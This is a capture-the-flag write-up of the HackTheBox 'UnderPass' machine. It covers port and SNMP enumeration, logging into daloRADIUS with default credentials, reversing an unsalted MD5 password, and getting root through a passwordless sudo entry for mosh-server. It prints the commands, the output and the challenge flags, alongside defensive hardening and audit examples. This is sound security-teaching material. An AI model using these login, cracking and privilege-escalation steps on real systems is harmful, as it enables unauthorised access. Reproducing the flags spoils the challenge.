📦 HackTheBox: UnderPass

UnderPass is the most recently retired of HackTheBox’s machines and one that I’m not ashamed to admit took me far too long to solve.

 rustscan --addresses 10.10.11.48 -- -sCV -Pn
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
Port scanning: Making networking exciting since... whenever.

[~] The config file is expected to be at "/home/psypherpunk/.rustscan.toml"
[~] Automatically increasing ulimit value to 5000.
Open 10.10.11.48:22
Open 10.10.11.48:80
[~] Starting Script(s)
[>] Running script "nmap -vvv -p {{port}} -{{ipversion}} {{ip}} -sCV -Pn" on ip 10.10.11.48
Depending on the complexity of the script, results may take some time to appear.
[~] Starting Nmap 7.94 ( https://nmap.org ) at 2024-12-23 21:07 GMT
NSE: Loaded 156 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 21:07
Completed NSE at 21:07, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 21:07
Completed NSE at 21:07, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 21:07
Completed NSE at 21:07, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 21:07
Completed Parallel DNS resolution of 1 host. at 21:07, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 2, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating Connect Scan at 21:07
Scanning 10.10.11.48 [2 ports]
Discovered open port 22/tcp on 10.10.11.48
Discovered open port 80/tcp on 10.10.11.48
Completed Connect Scan at 21:07, 0.04s elapsed (2 total ports)
Initiating Service scan at 21:07
Scanning 2 services on 10.10.11.48
Completed Service scan at 21:07, 6.09s elapsed (2 services on 1 host)
NSE: Script scanning 10.10.11.48.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 21:07
Completed NSE at 21:07, 1.53s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 21:07
Completed NSE at 21:07, 0.17s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 21:07
Completed NSE at 21:07, 0.00s elapsed
Nmap scan report for 10.10.11.48
Host is up, received user-set (0.020s latency).
Scanned at 2024-12-23 21:07:27 GMT for 7s

PORT   STATE SERVICE REASON  VERSION
22/tcp open  ssh     syn-ack OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 48:b0:d2:c7:29:26:ae:3d:fb:b7:6b:0f:f5:4d:2a:ea (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBK+kvbyNUglQLkP2Bp7QVhfp7EnRWMHVtM7xtxk34WU5s+lYksJ07/lmMpJN/bwey1SVpG0FAgL0C/+2r71XUEo=
|   256 cb:61:64:b8:1b:1b:b5:ba:b8:45:86:c5:16:bb:e2:a2 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIJ8XNCLFSIxMNibmm+q7mFtNDYzoGAJ/vDNa6MUjfU91
80/tcp open  http    syn-ack Apache httpd 2.4.52 ((Ubuntu))
| http-methods:
|_  Supported Methods: POST OPTIONS HEAD GET
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.52 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 21:07
Completed NSE at 21:07, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 21:07
Completed NSE at 21:07, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 21:07
Completed NSE at 21:07, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.31 seconds

The website on port 80 has…nothing: it’s a bare Apache placeholder.

At this point I admit to having been stumped: no amount of fuzzing or content-discovery turned up anything relevant.

…until I considered the name of the box: UnderPass. UnDerPass. UDP.

FFS…

For the sake of brevity (UDP scans are sloooooow), there’s one port open:

 sudo nmap -sU -p 161 -Pn -sCV 10.10.11.48
Starting Nmap 7.94 ( https://nmap.org ) at 2024-12-23 23:34 GMT
Nmap scan report for 10.10.11.48
Host is up (0.017s latency).

PORT    STATE SERVICE VERSION
161/udp open  snmp    SNMPv1 server; net-snmp SNMPv3 server (public)
| snmp-info:
|   enterprise: net-snmp
|   engineIDFormat: unknown
|   engineIDData: c7ad5c4856d1cf6600000000
|   snmpEngineBoots: 29
|_  snmpEngineTime: 2h29m33s
| snmp-sysdescr: Linux underpass 5.15.0-126-generic #136-Ubuntu SMP Wed Nov 6 10:38:22 UTC 2024 x86_64
|_  System uptime: 2h29m32.70s (897270 timeticks)
Service Info: Host: UnDerPass.htb is the only daloradius server in the basin!

daloradius? So that’s a thing:

“daloRADIUS is an advanced RADIUS web management application for managing hotspots and general-purpose ISP deployments.”

Tip: for reference, RADIUS itself:

“…is a networking protocol that provides centralized authentication, authorization, and accounting…”
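The foothold above came from two SNMP weaknesses: the agent answers the default community string to anyone, and its sysContact string names the host and the product running on it. As an added example, not from the writeup and not net-snmp’s shipped configuration, here is the weak snmpd.conf setting beside a hardened one; the community string, management subnet, SNMPv3 passphrases and contact details are placeholders.

```conf
# --- Weak: any unauthenticated client, from anywhere, can walk the whole tree with "public"
rocommunity public

# --- Hardened (net-snmp snmpd.conf directives)
# Expose only the system subtree, and only to the management network.
view systemonly included .1.3.6.1.2.1.1
rocommunity REPLACE_WITH_LONG_RANDOM_STRING 192.0.2.0/24 -V systemonly

# Better still, SNMPv3 with authentication and encryption instead of any community string
# (authPriv user; both passphrases are placeholders).
createUser monitor SHA "REPLACE_AUTH_PASSPHRASE" AES "REPLACE_PRIV_PASSPHRASE"
rouser monitor priv -V systemonly

# sysDescr, sysContact and sysLocation live inside the system subtree, so anyone the rules
# above admit still reads them: keep them free of hostnames, product names and hints.
sysContact  netops@example.com
sysLocation DC1
```

With only the `systemonly` view exposed, a scan like the one above still learns the kernel version from sysDescr (net-snmp fills it from uname), which is why the contact and location strings deserve the same scrutiny as the community string.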

A little searching turns up an article, How to install FreeRADIUS and Daloradius on Ubuntu 22.04, which suggests the path /daloradius/app/operators; thankfully, that yields a login page.

Furthermore, the same article lists the default credentials:

Username: administrator
Password: radius

…which allow authentication on the aforementioned login page.

There’s a Go to users list button which shows one user, svcMosh, with an apparent password of 412DD4759978ACFCC81DEAB01B382403. CrackStation reveals that to be the MD5 hash of underwaterfriends.
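The user’s password was stored as a bare, unsalted MD5 digest, which is why a public lookup table resolved it instantly; the same string then opened SSH. As an added example, not from the writeup and not daloRADIUS code, the following shows why table lookup works against unsalted MD5 and how a salted, iterated scheme (PBKDF2-HMAC-SHA256, with a random per-user salt) defeats precomputation. The wordlist is constructed for the demonstration.

```python
import hashlib
import hmac
import os

# Constructed wordlist standing in for a CrackStation-style precomputed table.
WORDLIST = ["password", "radius", "letmein", "underwaterfriends", "Summer2024"]


def md5_hex(word):
    return hashlib.md5(word.encode()).hexdigest()


def md5_table(words):
    """One MD5 per word, computed once and reusable against every unsalted digest ever seen."""
    return {md5_hex(w): w for w in words}


def lookup_unsalted_md5(hexdigest, table):
    """Reverse an unsalted MD5 digest by dictionary lookup (hex compared case-insensitively)."""
    return table.get(hexdigest.lower())


def hash_password(password, salt=None, iterations=600_000):
    """Salted, iterated hash: PBKDF2-HMAC-SHA256 over a random 16-byte salt."""
    salt = os.urandom(16) if salt is None else salt
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${dk.hex()}"


def verify_password(password, stored):
    """Recompute with the stored salt and iteration count, then compare in constant time."""
    _, iterations, salt_hex, dk_hex = stored.split("$")
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(dk.hex(), dk_hex)


def demo():
    table = md5_table(WORDLIST)
    # An unsalted digest (recomputed here from the constructed wordlist, uppercased the way
    # the application displayed it) falls to a single dictionary lookup.
    weak = md5_hex("underwaterfriends").upper()
    recovered = lookup_unsalted_md5(weak, table)
    # Two users with the same password get different stored values, so no precomputed
    # table applies to either, and every guess costs a full PBKDF2 derivation.
    stored_a = hash_password("underwaterfriends")
    stored_b = hash_password("underwaterfriends")
    return recovered, stored_a != stored_b, verify_password("underwaterfriends", stored_a)


if __name__ == "__main__":
    print(demo())  # ('underwaterfriends', True, True)
```

The slow hash does not make a weak password strong: a dictionary word still falls to an online guess or a short offline run. What changes is that the work cannot be shared across users or precomputed, which is the property the MD5 field above lacked.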

Armed with a username and password, it’s now possible to authenticate via SSH:

 sshpass -p underwaterfriends ssh svcMosh@10.10.11.48
Welcome to Ubuntu 22.04.5 LTS (GNU/Linux 5.15.0-126-generic x86_64)

…and grab the user flag:

svcMosh@underpass:~$ cat user.txt
3ab9794834a603438334dab0064b3f49

The svcMosh user has sudo privileges:

svcMosh@underpass:~$ sudo -l
Matching Defaults entries for svcMosh on localhost:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User svcMosh may run the following commands on localhost:
    (ALL) NOPASSWD: /usr/bin/mosh-server

mosh-server is the “server-side helper for mosh”, the latter being “Mosh: the mobile shell”. Among its uses, it can start a new server bound to a chosen UDP port:

svcMosh@underpass:~$ sudo /usr/bin/mosh-server new -p 1337


MOSH CONNECT 1337 vBTv9ZfL5FT1TF896btNVA

mosh-server (mosh 1.3.2) [build mosh 1.3.2]
Copyright 2012 Keith Winstein <mosh-devel@mit.edu>
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>.
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.

[mosh-server detached, pid = 2205]

That starts the server, as root since it was run via sudo, and detaches it. mosh-server, of course, has a counterpart in mosh-client, and the session key printed above is what links the two:

The 22-byte base64 session key given by mosh-server is supplied in the MOSH_KEY environment variable. This represents a 128-bit AES key that protects the integrity and confidentiality of the session.

…and connecting to the mosh-server now running as root via sudo:

svcMosh@underpass:~$ MOSH_KEY=vBTv9ZfL5FT1TF896btNVA mosh-client 127.0.0.1 1337
Welcome to Ubuntu 22.04.5 LTS (GNU/Linux 5.15.0-126-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/pro

 System information as of Thu Dec 19 01:40:28 PM UTC 2024

  System load:  0.05              Processes:             251
  Usage of /:   84.2% of 3.75GB   Users logged in:       0
  Memory usage: 9%                IPv4 address for eth0: 10.10.11.48
  Swap usage:   0%


Expanded Security Maintenance for Applications is not enabled.

0 updates can be applied immediately.

Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status


The list of available updates is more than a week old.
To check for new updates run: sudo apt update

Having effectively connected to a root session, it’s now possible to grab the root flag:

root@underpass:~# cat /root/root.txt
0e6a4749b8351bf77ef805282888a3ca
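Root here rests on a single sudoers line: a service account may run mosh-server as root without a password, although mosh never needs root (the server normally runs as whichever user logged in over SSH, so the entry can simply be removed). As an added example, not from the writeup, here is a small Python audit that parses `sudo -l` output and flags NOPASSWD entries granting root for binaries that hand out an interactive shell. The sample input is the svcMosh output above, and the list of shell-spawning binaries is a minimal illustrative set, not a complete catalogue.

```python
import re
from os.path import basename

# Constructed sample: the `sudo -l` output shown above for svcMosh.
SAMPLE_SUDO_L = """\
Matching Defaults entries for svcMosh on localhost:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin, use_pty

User svcMosh may run the following commands on localhost:
    (ALL) NOPASSWD: /usr/bin/mosh-server
"""

# Illustrative set: plain shells, plus mosh-server, which detaches a shell reachable by
# anyone holding the session key it prints.
SHELL_SPAWNERS = {"bash", "sh", "dash", "zsh", "mosh-server"}

# "(runas) TAG: TAG: command, command" as printed by `sudo -l`.
ENTRY_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$")


def parse_sudo_l(text):
    """Return one dict per command from the 'may run the following commands' section."""
    entries = []
    in_cmds = False
    for line in text.splitlines():
        if "may run the following commands" in line:
            in_cmds = True
            continue
        if not in_cmds or not line.strip():
            continue
        m = ENTRY_RE.match(line)
        if not m:
            continue
        runas = m.group("runas").split(":")[0].strip()          # "(ALL)" or "(root : root)"
        tags = {t.strip() for t in m.group("tags").split(":") if t.strip()}
        for cmd in m.group("cmds").split(","):
            entries.append({"runas": runas, "tags": tags, "cmd": cmd.strip()})
    return entries


def risky_entries(entries):
    """Root-equivalent, passwordless entries whose program yields an interactive shell."""
    flagged = []
    for e in entries:
        prog = basename(e["cmd"].split()[0])
        if e["runas"] in ("ALL", "root") and "NOPASSWD" in e["tags"] and prog in SHELL_SPAWNERS:
            flagged.append(e)
    return flagged


if __name__ == "__main__":
    for e in risky_entries(parse_sudo_l(SAMPLE_SUDO_L)):
        print(f"RISK: {e['runas']} NOPASSWD {e['cmd']}")
```

Run against real hosts, the check belongs in a configuration-compliance job rather than on the box itself: collect `sudo -l -U <user>` output centrally and treat any flagged entry as a finding to remove, not to wrap in extra arguments.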